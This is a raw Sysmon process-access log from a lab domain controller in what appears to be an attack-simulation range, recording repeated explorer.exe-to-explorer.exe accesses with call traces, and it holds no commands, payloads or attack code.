16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 